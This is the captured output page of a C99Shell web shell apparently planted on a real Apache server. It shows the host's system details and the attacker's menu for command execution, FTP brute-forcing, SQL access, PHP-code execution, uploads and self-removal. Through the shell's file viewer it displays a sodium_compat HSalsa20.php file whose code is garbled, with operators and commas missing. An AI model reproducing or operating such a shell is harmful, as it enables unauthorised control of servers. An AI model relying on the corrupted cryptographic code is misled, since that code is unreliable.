!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/paragonie/sodium_compat/src/Core/   drwxrwxr-x
Free 13.19 GB of 57.97 GB (22.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HSalsa20.php (3.59 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (class_exists('ParagonIE_Sodium_Core_HSalsa20'false)) {
    return;
}

/**
 * Class ParagonIE_Sodium_Core_HSalsa20
 */
abstract class ParagonIE_Sodium_Core_HSalsa20 extends ParagonIE_Sodium_Core_Salsa20
{
    
/**
     * Calculate an hsalsa20 hash of a single block
     *
     * HSalsa20 doesn't have a counter and will never be used for more than
     * one block (used to derive a subkey for xsalsa20).
     *
     * @internal You should not use this directly from another application
     *
     * @param string $in
     * @param string $k
     * @param string|null $c
     * @return string
     * @throws TypeError
     */
    
public static function hsalsa20($in$k$c null)
    {
        if (
$c === null) {
            
$x0  0x61707865;
            
$x5  0x3320646e;
            
$x10 0x79622d32;
            
$x15 0x6b206574;
        } else {
            
$x0  self::load_4(self::substr($c04));
            
$x5  self::load_4(self::substr($c44));
            
$x10 self::load_4(self::substr($c84));
            
$x15 self::load_4(self::substr($c124));
        }
        
$x1  self::load_4(self::substr($k04));
        
$x2  self::load_4(self::substr($k44));
        
$x3  self::load_4(self::substr($k84));
        
$x4  self::load_4(self::substr($k124));
        
$x11 self::load_4(self::substr($k164));
        
$x12 self::load_4(self::substr($k204));
        
$x13 self::load_4(self::substr($k244));
        
$x14 self::load_4(self::substr($k284));
        
$x6  self::load_4(self::substr($in04));
        
$x7  self::load_4(self::substr($in44));
        
$x8  self::load_4(self::substr($in84));
        
$x9  self::load_4(self::substr($in124));

        for (
$i self::ROUNDS$i 0$i -= 2) {
            
$x4 ^= self::rotate($x0 $x127);
            
$x8 ^= self::rotate($x4 $x09);
            
$x12 ^= self::rotate($x8 $x413);
            
$x0 ^= self::rotate($x12 $x818);
            
$x9 ^= self::rotate($x5 $x17);
            
$x13 ^= self::rotate($x9 $x59);
            
$x1 ^= self::rotate($x13 $x913);
            
$x5 ^= self::rotate($x1 $x1318);
            
$x14 ^= self::rotate($x10 $x67);
            
$x2 ^= self::rotate($x14 $x109);
            
$x6 ^= self::rotate($x2 $x1413);
            
$x10 ^= self::rotate($x6 $x218);
            
$x3 ^= self::rotate($x15 $x117);
            
$x7 ^= self::rotate($x3 $x159);
            
$x11 ^= self::rotate($x7 $x313);
            
$x15 ^= self::rotate($x11 $x718);
            
$x1 ^= self::rotate($x0 $x37);
            
$x2 ^= self::rotate($x1 $x09);
            
$x3 ^= self::rotate($x2 $x113);
            
$x0 ^= self::rotate($x3 $x218);
            
$x6 ^= self::rotate($x5 $x47);
            
$x7 ^= self::rotate($x6 $x59);
            
$x4 ^= self::rotate($x7 $x613);
            
$x5 ^= self::rotate($x4 $x718);
            
$x11 ^= self::rotate($x10 $x97);
            
$x8 ^= self::rotate($x11 $x109);
            
$x9 ^= self::rotate($x8 $x1113);
            
$x10 ^= self::rotate($x9 $x818);
            
$x12 ^= self::rotate($x15 $x147);
            
$x13 ^= self::rotate($x12 $x159);
            
$x14 ^= self::rotate($x13 $x1213);
            
$x15 ^= self::rotate($x14 $x1318);
        }

        return 
self::store32_le($x0) .
            
self::store32_le($x5) .
            
self::store32_le($x10) .
            
self::store32_le($x15) .
            
self::store32_le($x6) .
            
self::store32_le($x7) .
            
self::store32_le($x8) .
            
self::store32_le($x9);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0126 ]--